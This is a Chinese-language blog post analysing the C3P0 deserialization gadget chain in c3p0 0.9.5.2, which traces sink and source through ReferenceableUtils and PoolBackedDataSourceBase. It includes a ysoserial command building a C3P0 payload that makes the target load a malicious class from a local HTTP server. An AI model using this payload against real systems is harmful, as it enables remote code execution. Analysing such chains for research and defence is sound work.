Aizlm HomeArchivesTags
c3p0链分析

C3P0链分析

环境搭建

1
2
3
4
5
<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>

URLClassLoader链

  • gadget:
1
2
3
com.mchange.v2.naming.ReferenceableUtils#referenceToObject;-->
com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized#getObject;-->
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject;
  1. 打个ysoserial C3P0的payload先
1
java -jar ysoserial.jar -g C3P0 -a "http://127.0.0.1:9999/:Calc"
  1. 启个http服务,下面放个Calc.class,静态代码块放点恶意代码
1
python -m http.server 9999

漏洞分析

反序列化

  1. sink点:Class.forName出现在com.mchange.v2.naming.ReferenceableUtils#referenceToObject,第二个属性为true时,会触发加载静态代码块中的内容
image-20230713104428141
  1. source:com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,需要满足readObject的类实现IndirectlySerialized接口,看了下对应的实现类com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized
image-20230713110208964
  1. 通过ReferenceSerialized类的getObject方法连接到sink触发的方法
image-20230713112424065
  • 总结:sink的触发限制条件是传入的类要是IndirectlySerialized的实现类

序列化

  1. writeObject的类ConnectionPoolDataSource本身没有实现Serializable序列化接口,抛出NotSerializableException异常的过程中将connectionPoolDataSource进行封装
image-20230713135150907 image-20230713135332316 image-20230713135342744
  1. com.mchange.v2.naming.ReferenceIndirector#indirectFormconnectionPoolDataSource转为Referenceable实例,最终包装成ReferenceSerialized对象
image-20230713135539433

总结

  1. 反序列化过程中,需要满足传入的类要是IndirectlySerialized的实现类,这一点在writeObject的异常封装类中可以满足
  2. 序列化过程中,类需要实现ConnectionPoolDataSourceReferenceable,最终通过其中的reference实例写入恶意的url进行加载类实例
image-20230713140056783

Ref

  1. https://blog.csdn.net/LTianHang/article/details/128909196
  2. https://xz.aliyun.com/t/11830
Author: Aizlm
Link: https://aizlm.github.io/2023/07/13/c3p0链分析/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
代码审计